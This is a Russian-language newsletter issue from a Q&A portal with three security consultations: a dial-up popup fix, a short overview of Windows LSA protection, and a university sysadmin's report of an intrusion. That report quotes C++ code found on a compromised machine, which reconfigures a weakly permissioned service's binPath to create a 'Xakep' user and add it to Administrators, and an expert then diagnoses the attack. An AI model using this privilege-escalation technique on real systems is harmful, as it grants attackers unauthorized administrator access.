Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

RFpro.ru: Защита информации, шифрование данных


Хостинг портала RFpro.ru:
Московский хостер
Профессиональный ХОСТИНГ на базе Linux x64 и Windows x64

РАССЫЛКИ ПОРТАЛА RFPRO.RU

Лучшие эксперты по данной тематике

Валерий Ахметович Набиуллин aka ValeryN
Статус: Мастер-Эксперт
Рейтинг: 5233
∙ повысить рейтинг »
Коцюрбенко Алексей aka Жерар
Статус: Академик
Рейтинг: 3861
∙ повысить рейтинг »
Elinn
Статус: Профессор
Рейтинг: 1327
∙ повысить рейтинг »

/ КОМПЬЮТЕРЫ И СОФТ / Защита информации / Защита информации, шифрование данных

Номер выпуска:507
Дата выхода:28.02.2012, 16:00
Администратор рассылки:lupus campestris (Академик)
Подписчиков / экспертов:269 / 79
Вопросов / ответов:3 / 4

Консультация # 114646: Уважаемые эксперты! Система XP, соединение с интернетом DialUp. При открытии любой HTML страницы на компьютере самопроизвольно открывается окно соединения с интернетом, нажимаю отмена, закрывается и снова открывается. И так бесконечно, пока не закроешь эту страницу. Сильно мешает работать. DrWeb и AdAware ничего не находят. Может гд...


Консультация # 112871: на каких принципах основана защита информации в среде Windows?...
Консультация # 120583: Привет всем. Сразу прошу прошение за ошибки (не из России я). Такая проблема у миня, я СисАдмин в Университете (администрираю 40 комп. OS : Win 2000 Pro (all hotfixes)) В прошом году меня тоже взломали, уже не знал чо делать, но нечаина на один компютар нашол утилиты : sc.exe и Service Permissions Checker. Вот што они делали : <...

Консультация # 114646:

Уважаемые эксперты!
Система XP, соединение с интернетом DialUp.
При открытии любой HTML страницы на компьютере самопроизвольно открывается окно соединения с интернетом, нажимаю отмена, закрывается и снова открывается. И так бесконечно, пока не закроешь эту страницу.
Сильно мешает работать. DrWeb и AdAware ничего не находят.
Может где в настройках системы или соединения.
Благодарю за помощь.
Ю.М.

Дата отправки: 18.12.2007, 13:31
Вопрос задал: Urmarin
Всего ответов: 2
Страница онлайн-консультации »


Консультирует Crion (Студент):

Здравствуйте, Urmarin!
Открываем IE -> Сервис-> Свойства Обозревателя->Подключение.
Выбираем название своего DialUp подключения и отмечаем пункт "Никогда не использовать".

Консультировал: Crion (Студент)
Дата отправки: 18.12.2007, 15:06
Рейтинг ответа:

НЕ одобряю 0 одобряю!


Консультирует kool (Практикант):

Здравствуйте, Urmarin!
Открываем IE -> Сервис-> Свойства Обозревателя->ДомашняяСтраница->Адрес
Указываем ->С пустой ->Ok
Удачи!

Консультировал: kool (Практикант)
Дата отправки: 18.12.2007, 18:08
Рейтинг ответа:

НЕ одобряю 0 одобряю!

Консультация # 112871:

на каких принципах основана защита информации в среде Windows?

Дата отправки: 07.12.2007, 21:38
Вопрос задал: Маникаев,Спартак,Ринатович
Всего ответов: 1
Страница онлайн-консультации »


Консультирует MagTux (Студент):

Здравствуйте, Маникаев,Спартак,Ринатович!

Тема "Организация защиты информации в среде Windows" потянула бы как минимум на курсовой по защите информации. Тем более всех тонкостей не известно никому, кроме самих создателей системы. Здесь можно указать лишь некоторые направления исследования этой темы.

"В операционной системе Windows NT всеми вопросами безопасности занимается защищенная подсистема, известная под названием Local Security Authority Subsystem Service (LSASS). Именно эта подсистема поддерживает базу данных учетных записей, содержащую в том числе и информацию о правах пользователей."

Кроме информации об учётных записях пользователей безопасное хранилище данных LSA содержит также и информацию некоторых приложений, которую редактировать/удалять могут только записавшее информацию приложение. Это хранилище используется некоторыми триал-программами для хранения информации о времени окончания триал-использования, например.
Доступ в хранилище не имеет даже администратор системы, хотя на сегодняшний день существуют программы и различные методы для чтения и редактирования этих данных (лично вскрывал штатными средствами Windows, хотя и не предусмотрено, но это уже вопрос недостатков системы безопасности).

Можете ознакомиться с подробной статьёй о шифровании (и не только) в Win2k/XP http://www.3dnews.ru/software/win-xp-encrypting/

LSA - это всего один из инструментов обеспечения безопасности и защиты информации. Не стоит забывать также о файловой системе NTFS со встроенными возможностями защиты данных.

Консультировал: MagTux (Студент)
Дата отправки: 08.12.2007, 01:01
Рейтинг ответа:

НЕ одобряю 0 одобряю!

Консультация # 120583:

Привет всем.
Сразу прошу прошение за ошибки (не из России я).
Такая проблема у миня, я СисАдмин в Университете (администрираю 40 комп. OS : Win 2000 Pro (all hotfixes))
В прошом году меня тоже взломали, уже не знал чо делать, но нечаина на один компютар нашол утилиты : sc.exe и Service Permissions Checker.
Вот што они делали :



После того как удалил всё, вот што показовала :



Карочи, удалил я Macromedia Licensing.exe, и Сервис тоже удалил в регедит, думал што всё теперь проблем больше не будет, не тут то было.
Согодня опять спалил новыи Юзер "Хакер", и на Диск Д: нашол код зделан в С++.

[CODE]// sys.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <stdlib.h>
#include <windows.h>
#include <conio.h>
int main(int argc, char* argv[])
{
// WinExec("sc.exe queryex "Macromedia Licensing Services" > d:\log.log.log",SW_SHOW);
WinExec("sc.exe config "Macromedia Licensing Service" binPath= "net user Xakep Xakep /add"",SW_SHOW);
Sleep(1000);
WinExec("sc.exe start "Macromedia Licensing Service"",SW_SHOW);
Sleep(1000);
WinExec("sc.exe config "Macromedia Licensing Service" binPath= "net localuser Administrators Xakep /add"",SW_SHOW);
Sleep(1000);
WinExec("sc.exe start "Macromedia Licensing Service"",SW_SHOW);
getch();
return 0;
}[/CODE]
.и ищо несколько фаилов, вылажу на рапид штоб посмотрели:
http://rapidshare.com/files/87310556/sys.rar.html

В моём зале много програм есть в том числе и Visual Studio ну конечно есть и cmd.exe
Все студенты работают под User - Restricted user.
С: - read & Execute, в regedit тоже самое, и в Group Policy по игрался.

Не понемаю как они создают новыи Сервис в регедит, User имеет права толыко читать, есть предположение што они под Юзер : System делают ето.
Помогите пожалуиста, не знаю уже што делать, спасибо аднозначно, жду ответов штоб решить проблему.

Дата отправки: 28.01.2008, 20:01
Вопрос задал: EXtremer
Всего ответов: 1
Страница онлайн-консультации »


Консультирует DimanG (Студент):

Здравствуйте, EXtremer!

Предположить можно следующее, судя по вашей картинке: была использована уязвимость в службе лицензирования от Macromedia (если у вас таковая имеется) для выполнения кода, повышающего привилегии пользователя Xakep. Также вам необходимо исследовать все точки автозапуска, т.к. этот код, который вы выложили, мог быть исполнен под админскими (вашими, например) правами (до того, как Xakep сам станет админом). Утиль берём отсюдова: http://download.sysinternals.com/Files/Autoruns.zip . Информации для анализа пока недостаточно.

Консультировал: DimanG (Студент)
Дата отправки: 29.01.2008, 09:16
Рейтинг ответа:

НЕ одобряю 0 одобряю!


Оценить выпуск | Задать вопрос экспертам

главная страница  |  стать участником  |  получить консультацию
техническая поддержка  |  восстановить логин/пароль

Дорогой читатель!
Команда портала RFPRO.RU благодарит Вас за то, что Вы пользуетесь нашими услугами. Вы только что прочли очередной выпуск рассылки. Мы старались. Пожалуйста, оцените его. Если совет помог Вам, если Вам понравился ответ, Вы можете поблагодарить автора - для этого в каждом ответе есть специальные ссылки. Вы можете оставить отзыв о работе портале. Нам очень важно знать Ваше мнение. Вы можете поближе познакомиться с жизнью портала, посетив наш форум, почитав журнал, который издают наши эксперты. Если у Вас есть желание помочь людям, поделиться своими знаниями, Вы можете зарегистрироваться экспертом. Заходите - у нас интересно!
МЫ РАБОТАЕМ ДЛЯ ВАС!



В избранное